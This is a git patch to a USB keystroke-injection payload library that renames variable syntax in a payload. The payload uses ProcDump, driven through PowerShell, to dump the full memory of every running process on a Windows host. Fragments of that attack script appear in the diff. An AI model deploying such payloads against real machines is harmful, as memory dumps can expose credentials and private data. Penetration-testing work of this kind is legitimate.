From f143daa5183e8e141ea1500acc847d960b915bbf Mon Sep 17 00:00:00 2001 From: Aleff Date: Sat, 1 Jun 2024 10:47:20 +0200 Subject: [PATCH] Redefined DEFINEtions from $ to # --- .../Dump_Windows_Memory_Through_ProcDump/README.md | 4 ++-- .../Dump_Windows_Memory_Through_ProcDump/payload.txt | 7 +++---- 2 files changed, 5 insertions(+), 6 deletions(-) diff --git a/payloads/library/exfiltration/Dump_Windows_Memory_Through_ProcDump/README.md b/payloads/library/exfiltration/Dump_Windows_Memory_Through_ProcDump/README.md index 6c912f6..d8c2b6a 100644 --- a/payloads/library/exfiltration/Dump_Windows_Memory_Through_ProcDump/README.md +++ b/payloads/library/exfiltration/Dump_Windows_Memory_Through_ProcDump/README.md @@ -34,8 +34,8 @@ To obtain all active process PIDs the tasklist command is used, which provides t 1. Download ProcDump\[5]. 2. Move the extracted ProcDump folder or directly the executable, as you prefer, inside Rubber Ducky's memory. -3. Then you have to change the variable `$WHAT_EXE_DO_YOU_WANT_TO_USE` if you want to use an executable other than `procdump64a.exe`, i.e. `procdump.exe` and, in this case, you have to change the variable to `procdump`. -4. When you put the executable(s) inside the Rubber Ducky memory you must indicate the path where is stored, i.e. if the executable is inside the path `F:\ProcDump\Procdump\procdump.exe` you must change the variable `$PATH_TO_EXE` into `\ProcDump\Procdump\` mean while if it is inside the path `F:\somethingelse\procdump.exe` you must change this variable into `\somethingelse\`. +3. Then you have to change the variable `#WHAT_EXE_DO_YOU_WANT_TO_USE` if you want to use an executable other than `procdump64a.exe`, i.e. `procdump.exe` and, in this case, you have to change the variable to `procdump`. +4. When you put the executable(s) inside the Rubber Ducky memory you must indicate the path where is stored, i.e. if the executable is inside the path `F:\ProcDump\Procdump\procdump.exe` you must change the variable `#PATH_TO_EXE` into `\ProcDump\Procdump\` mean while if it is inside the path `F:\somethingelse\procdump.exe` you must change this variable into `\somethingelse\`. ## Read More diff --git a/payloads/library/exfiltration/Dump_Windows_Memory_Through_ProcDump/payload.txt b/payloads/library/exfiltration/Dump_Windows_Memory_Through_ProcDump/payload.txt index dd4dd1c..63282c8 100644 --- a/payloads/library/exfiltration/Dump_Windows_Memory_Through_ProcDump/payload.txt +++ b/payloads/library/exfiltration/Dump_Windows_Memory_Through_ProcDump/payload.txt @@ -14,15 +14,14 @@ REM - Authorization to execute powershell commands REM You must change it to 'procdump' if you want to use procdump.exe instead of procdump64a.exe -DEFINE $WHAT_EXE_DO_YOU_WANT_TO_USE procdump64a +DEFINE #WHAT_EXE_DO_YOU_WANT_TO_USE procdump64a REM Path to the EXE file stored in the usb, i.e. if 'F:\ProcDump\Procdump\procdump.exe' you must use '\ProcDump\Procdump\' -DEFINE $PATH_TO_EXE \ProcDump\Procdump\ +DEFINE #PATH_TO_EXE \ProcDump\Procdump\ REM Driver Label of your RubberDucky - Default: DUCKY DEFINE #DUCKY_DRIVE_LABEL DUCKY - EXTENSION DETECT_READY REM VERSION 1.1 REM AUTHOR: Korben @@ -66,7 +65,7 @@ STRINGLN_POWERSHELL foreach ($i in $a){ if ( $i -like '*PID*'){ $i -match 'PID.\s+(.+)'; - ".$PATH_TO_EXE$WHAT_EXE_DO_YOU_WANT_TO_USE.exe" -ma $matches[1]; + ".#PATH_TO_EXE#WHAT_EXE_DO_YOU_WANT_TO_USE.exe" -ma $matches[1]; } } exit;